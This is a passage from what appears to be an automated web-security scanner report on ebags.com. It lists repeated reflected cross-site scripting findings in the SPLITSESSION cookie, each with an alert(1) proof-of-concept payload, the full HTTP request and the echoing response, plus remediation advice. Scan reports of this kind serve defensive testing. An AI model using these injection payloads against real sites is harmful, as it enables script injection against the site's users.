Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:03 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|e2144';alert(1)//62264d29455');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.54. http://www.ebags.com/department/designer-handbags [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/designer-handbags

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f77f7'%3balert(1)//ef3d048712a was submitted in the SPLITSESSION cookie. This input was echoed as f77f7';alert(1)//ef3d048712a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/designer-handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cf77f7'%3balert(1)//ef3d048712a; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:34 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:06:34 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 58402


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|f77f7';alert(1)//ef3d048712a');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.55. http://www.ebags.com/department/handbags [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/handbags

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84047'%3balert(1)//6c6d777cb40 was submitted in the SPLITSESSION cookie. This input was echoed as 84047';alert(1)//6c6d777cb40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/handbags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C84047'%3balert(1)//6c6d777cb40; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:37 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:37 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 71505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|84047';alert(1)//6c6d777cb40');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.56. http://www.ebags.com/department/kids-and-baby [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/kids-and-baby

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79b06'%3balert(1)//f0d2e35aa8e was submitted in the SPLITSESSION cookie. This input was echoed as 79b06';alert(1)//f0d2e35aa8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/kids-and-baby HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C79b06'%3balert(1)//f0d2e35aa8e; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:30 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:30 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 65101


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|79b06';alert(1)//f0d2e35aa8e');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.57. http://www.ebags.com/department/luggage [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/luggage

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80dc1'%3balert(1)//d3996fefb2c was submitted in the SPLITSESSION cookie. This input was echoed as 80dc1';alert(1)//d3996fefb2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/luggage HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C80dc1'%3balert(1)//d3996fefb2c; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 73030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|80dc1';alert(1)//d3996fefb2c');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.58. http://www.ebags.com/department/messenger-bags [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/messenger-bags

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5b7a'%3balert(1)//f4eb8fb3d72 was submitted in the SPLITSESSION cookie. This input was echoed as a5b7a';alert(1)//f4eb8fb3d72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/messenger-bags HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Ca5b7a'%3balert(1)//f4eb8fb3d72; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:49 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:49 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69522


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|a5b7a';alert(1)//f4eb8fb3d72');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.59. http://www.ebags.com/department/sale [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/sale

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7302c'%3balert(1)//ca8b38adb31 was submitted in the SPLITSESSION cookie. This input was echoed as 7302c';alert(1)//ca8b38adb31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C7302c'%3balert(1)//ca8b38adb31; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:58 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:58 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 87023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|7302c';alert(1)//ca8b38adb31');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.60. http://www.ebags.com/department/snow-and-skate [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/snow-and-skate

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da2d'%3balert(1)//f4a0cd679c7 was submitted in the SPLITSESSION cookie. This input was echoed as 6da2d';alert(1)//f4a0cd679c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/snow-and-skate HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C6da2d'%3balert(1)//f4a0cd679c7; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:01 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:01 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 62344


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|6da2d';alert(1)//f4a0cd679c7');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.61. http://www.ebags.com/department/sports-and-duffels [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/sports-and-duffels

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83a31'%3balert(1)//4d05bbfeabd was submitted in the SPLITSESSION cookie. This input was echoed as 83a31';alert(1)//4d05bbfeabd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/sports-and-duffels HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C83a31'%3balert(1)//4d05bbfeabd; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:04 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:04 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 70582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|83a31';alert(1)//4d05bbfeabd');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.62. http://www.ebags.com/department/travel-accessories [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/travel-accessories

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 521a0'%3balert(1)//e78acb8c688 was submitted in the SPLITSESSION cookie. This input was echoed as 521a0';alert(1)//e78acb8c688 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /department/travel-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C521a0'%3balert(1)//e78acb8c688; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:59 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:59 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 72403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|521a0';alert(1)//e78acb8c688');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.63. http://www.ebags.com/department/wallets-and-accessories [SPLITSESSION cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/wallets-and-accessories

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48e43'%3balert(1)//f8f1500fa15 was submitted in the SPLITSESSION cookie. This input was echoed as 48e43';alert(1)//f8f1500fa15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

